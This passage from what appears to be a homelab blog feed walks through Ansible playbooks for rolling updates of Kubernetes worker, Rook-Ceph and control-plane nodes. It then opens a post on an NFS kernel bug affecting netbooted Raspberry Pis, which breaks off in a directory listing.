</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">upgrade</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">reboot machine</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reboot</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for the machine to accept ansible commands again</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for_connection</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">clear OSD blocklist</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd blocklist clear</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run autoremove</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">autoremove</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for one minute</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>The <code>clear OSD blocklist</code> task clears Ceph&rsquo;s client blocklist. Most of my worker
nodes don&rsquo;t have any storage of their own, and instead use netboot and a Ceph
RBD volume for their root FS. And sometimes, Ceph puts clients on a blocklist,
as I&rsquo;ve explained in more detail <a href="https://blog.mei-home.net/posts/netboot-prob-virtualbox/">here</a>.
I&rsquo;m also giving all my plays a pause at the end,
to afford the cluster some time to settle again before the next batch of workers
is taken down.</p>
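<p>If you want to see what is actually on that blocklist before clearing it, the
rook-ceph plugin can show it as well. Something like this should do, run manually
from the cnc host (I usually just clear it blindly):</p>
<pre tabindex="0"><code># list the current client blocklist entries
kubectl rook-ceph --operator-namespace rook-ceph -n rook-cluster ceph osd blocklist ls
</code></pre>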
<p>For the Ceph nodes, I need to get a little bit more involved. I start out with
pre and post tasks, which set and later unset the Ceph <code>noout</code> flag. This flag tells
Ceph not to mark OSDs as out when they go down. Without it, which is the default state,
Ceph starts re-balancing data onto the remaining OSDs once an OSD has been out of
the cluster for some time. That&rsquo;s useful when an OSD genuinely dies, but during a
planned reboot, <code>noout</code> tells Ceph that the OSD will be back shortly and no
re-balancing is needed.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set osd noout</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd set noout</span>
</span></span></code></pre></div><p>As you can see here, I&rsquo;m again delegating execution of the command to my C&amp;C host,
as no other host has the necessary k8s certs. This command also needs an absolute
path to its binary, though this time that&rsquo;s not <code>kubectl</code> itself, but the binary
of the <a href="https://github.com/rook/kubectl-rook-ceph">rook-ceph plugin</a>. Normally
I would call it with <code>kubectl rook-ceph ...</code>, but that does not work with the
<code>command</code> module, so the plugin binary gets called directly.</p>
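<p>In case you don&rsquo;t have the plugin yet: it&rsquo;s distributed via <a href="https://krew.sigs.k8s.io/">krew</a>,
which is also where the <code>.krew/bin</code> path above comes from. If I remember correctly,
installing it boils down to:</p>
<pre tabindex="0"><code># install the rook-ceph plugin via krew; the binary ends up under ~/.krew/bin/
kubectl krew install rook-ceph
kubectl rook-ceph --help
</code></pre>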
<p>The next extra, compared to the worker node play, is that I&rsquo;m actively waiting
for the Ceph OSDs to come back. This is important to make sure that I don&rsquo;t
start the updates of the next OSD node before the previous one is back up and
running, because otherwise, bad things would happen. For one thing, I&rsquo;ve got
workloads already using the Ceph storage. For another, most of my worker nodes
will use storage from Ceph for their root disks.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for OSDs to start</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd status &#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">ceph_end</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">until</span>: <span style="color:#e6db74">&#39;(ceph_end.stdout | regex_findall(&#34;.*,up.*&#34;, multiline=True) | list | length) == (ceph_end.stdout_lines | length - 1)&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">retries</span>: <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delay</span>: <span style="color:#ae81ff">10</span>
</span></span></code></pre></div><p>This task waits for a maximum of 120 seconds for the node&rsquo;s OSDs to come up.
The output of <code>ceph osd status</code> looks like this:</p>
<pre tabindex="0"><code>ID  HOST     USED  AVAIL  WR OPS  WR DATA  RD OPS  RD DATA  STATE      
 0  nakith   191G  7260G      0        0       0        0   exists,up  
 1  nakith   809M  1862G      4     11.1k      5       26   exists,up  
 2  neper    391M   931G      0        0       1        0   exists,up  
 3  neper    191G  3534G      0        0       0     14.2k  exists,up  
</code></pre><p>That&rsquo;s then parsed with a regex, and the number of lines with <code>up</code> in the
state column is compared to the number of output lines minus the header line.
Just for completeness&rsquo; sake, here is the full Ceph play:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes Ceph nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd set noout</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run apt upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">upgrade</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">reboot machine</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reboot</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for the machine to accept ansible commands again</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for_connection</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for OSDs to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd status &#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">register</span>: <span style="color:#ae81ff">ceph_end</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">until</span>: <span style="color:#e6db74">&#39;(ceph_end.stdout | regex_findall(&#34;.*,up.*&#34;, multiline=True) | list | length) == (ceph_end.stdout_lines | length - 1)&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">retries</span>: <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delay</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run autoremove</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">autoremove</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">post_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unset osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd unset noout</span>
</span></span></code></pre></div><p>And finally, the control plane nodes. The main addition here is that I&rsquo;m using
Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/wait_for_module.html">wait_for module</a>
to wait until the CP components are up again. Or, to be more precise, to wait
until their ports are open, as I&rsquo;m not really doing a readiness check.
Here is the play:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update k8s controller hosts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-controller</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run apt upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">upgrade</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">reboot machine</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reboot</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for the machine to accept ansible commands again</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for_connection</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for kubelet to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">10250</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for kube-apiserver to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">6443</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for kube-vip to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2112</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for etcd to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2379</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for ceph mon to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">6789</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run autoremove</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">autoremove</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for one minute after controller update</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>The additional waits for the CP components&rsquo; ports to accept connections
are a bit of insurance, to make sure the node is fully up again. This
could certainly be improved by checking the Pod status via <code>kubectl</code> instead,
but this approach has served me well for about a year now in my Nomad cluster,
so it should be fine here as well.</p>
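<p>Should I ever want to make that check stricter, polling the apiserver&rsquo;s <code>/readyz</code>
endpoint instead of just its port would be one option. The following is only a sketch
I haven&rsquo;t added to the play, and it assumes the apiserver&rsquo;s cert is valid for the
node&rsquo;s IP:</p>
<pre tabindex="0"><code># sketch: wait until the node-local kube-apiserver reports readiness
- name: wait for kube-apiserver readiness
  tags:
    - kubernetes
  delegate_to: cnc
  become_user: my_user
  command:
    argv:
      - /home/my_user/.local/bin/kubectl
      - get
      - --raw=/readyz
      - --server=https://{{ ansible_default_ipv4.address }}:6443
  register: apiserver_ready
  until: apiserver_ready.stdout == "ok"
  retries: 12
  delay: 10
</code></pre>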
<p>And with that, I&rsquo;ve finally got my Kubernetes nodes in the regular updates as
well. It was really high time: I set the nodes up back on the 20th of December
and hadn&rsquo;t updated them since. &#x1f62c;</p>
]]></content:encoded>
    </item>
    <item>
      <title>NFS problems with new Ubuntu 22.04 kernel</title>
      <link>https://blog.mei-home.net/posts/broken-kernel-nfs/</link>
      <pubDate>Sat, 17 Feb 2024 11:59:01 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/broken-kernel-nfs/</guid>
      <description>I did not have kernel issues for a really long time.</description>
      <content:encoded><![CDATA[<p>Yesterday&rsquo;s Homelab host update did not at all go as intended. I hit a kernel
bug in the NFS code.</p>
<p>To describe the problem, I need to go into a bit of detail on my setup, so
please bear with me.</p>
<p>I&rsquo;ve got a fleet of 8 Raspberry Pi CM4s and a single Udoo x86 II forming the
backbone of the compute in my Homelab. All of them do netbooting, with no
per-host storage at all. To be able to do host updates, including kernels,
the boot files used for netbooting are separated per host, and each host&rsquo;s files
are mounted to that host&rsquo;s <code>/boot/firmware</code> dir via NFS.
It looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ls -l /mnt/netboot/
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95210641</span> Feb <span style="color:#ae81ff">17</span> 12:10 abcd
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95206027</span> Feb <span style="color:#ae81ff">17</span> 12:45 efgh
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95209268</span> Feb <span style="color:#ae81ff">17</span> 11:49 ijkl
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95212903</span> Dec <span style="color:#ae81ff">21</span> 23:06 mnop
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95208373</span> Feb <span style="color:#ae81ff">17</span> 12:10 qrst
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95211504</span> Feb <span style="color:#ae81ff">17</span> 11:49 uvwx
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">94928358</span> Nov <span style="color:#ae81ff">26</span> 15:56 xyz
</span></span><span style="display:flex;"><span>ls -l /mnt/netboot/abcd/
</span></span><span style="display:flex;"><span>total <span style="color:#ae81ff">92267</span>
</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">1024</span> Jan <span style="color:#ae81ff">16</span>  <span style="color:#ae81ff">2023</span> README
